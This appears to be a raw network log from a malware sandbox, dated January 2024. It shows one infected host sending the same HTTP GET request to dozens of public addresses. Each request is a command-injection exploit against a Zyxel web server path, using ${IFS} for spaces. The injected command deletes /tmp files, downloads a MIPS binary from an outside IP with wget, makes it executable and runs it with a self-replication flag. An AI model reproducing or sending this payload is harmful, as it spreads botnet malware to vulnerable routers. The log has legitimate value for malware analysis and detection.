                                                Jan 29, 2024 07:08:09.770165920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9650192.168.2.2352436163.52.110.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770207882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9651192.168.2.2346020126.172.88.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770243883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9652192.168.2.233413479.73.78.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770267010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9653192.168.2.233999043.204.129.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770288944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9654192.168.2.2336372173.229.196.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770324945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9655192.168.2.2339544158.252.33.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770363092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9656192.168.2.2360304136.87.156.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770395994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9657192.168.2.235953840.235.168.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770467043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9658192.168.2.2345612137.170.2.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770492077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9659192.168.2.2348346219.146.126.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770558119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9660192.168.2.2358982172.234.171.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770592928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9661192.168.2.2353740160.208.178.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770632029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9662192.168.2.234796424.67.94.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770673990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9663192.168.2.235336672.244.45.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770709038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9664192.168.2.2353010211.226.160.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770767927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9665192.168.2.2334450133.64.201.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770818949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9666192.168.2.2344552158.188.24.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770864964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9667192.168.2.234951862.93.138.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770903111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9668192.168.2.235451654.82.70.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770950079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9669192.168.2.234536254.123.164.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.770992041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9670192.168.2.233849832.46.99.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771022081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9671192.168.2.2341642183.23.53.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771084070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9672192.168.2.2346824137.16.37.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771115065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9673192.168.2.234569677.122.206.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771146059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9674192.168.2.234006254.217.93.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771179914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9675192.168.2.2360926136.115.9.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771239996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9676192.168.2.2345656198.246.205.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771279097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9677192.168.2.234141278.90.14.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771321058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9678192.168.2.2358272206.172.103.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771382093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9679192.168.2.233954696.214.146.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771428108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9680192.168.2.2347072219.63.33.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771465063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9681192.168.2.234294812.99.39.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771511078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9682192.168.2.2349262138.12.3.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771538019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9683192.168.2.2343846203.79.176.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771574974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9684192.168.2.2349216222.69.8.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771614075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9685192.168.2.2337416126.146.21.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771660089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9686192.168.2.2340644217.238.83.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771708965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9687192.168.2.236066664.75.70.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771752119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9688192.168.2.2354870181.253.71.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771786928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9689192.168.2.234420684.89.79.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771836042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9690192.168.2.234582876.67.57.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771866083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9691192.168.2.2355850212.24.110.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771919966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9692192.168.2.2359356152.26.190.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.771972895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9693192.168.2.2358070115.158.215.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772016048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9694192.168.2.233906472.43.170.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772053003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9695192.168.2.2354754198.166.199.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772093058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9696192.168.2.2350732177.123.167.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772123098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9697192.168.2.2340500179.52.208.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772156000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9698192.168.2.2337552176.166.98.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772208929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9699192.168.2.2359352206.11.42.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772253990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9700192.168.2.234645034.79.148.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772301912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9701192.168.2.235340414.211.69.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772332907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9702192.168.2.234073891.79.147.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772386074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9703192.168.2.2338842202.0.167.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772433996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9704192.168.2.234094245.115.196.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772464037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9705192.168.2.2358126149.86.125.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772502899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9706192.168.2.2347428192.116.55.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772532940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9707192.168.2.2347660176.116.2.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772588968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9708192.168.2.2337938196.113.183.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772619963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9709192.168.2.234632258.142.253.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772659063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9710192.168.2.233896012.218.162.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:09.772713900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9711192.168.2.2357938168.86.144.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9712192.168.2.235624651.73.34.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9713192.168.2.234573640.163.181.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9714192.168.2.2346860173.165.36.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9715192.168.2.233301681.55.57.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9716192.168.2.2336338168.21.19.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9717192.168.2.236074442.189.189.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9718192.168.2.2356800177.43.186.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
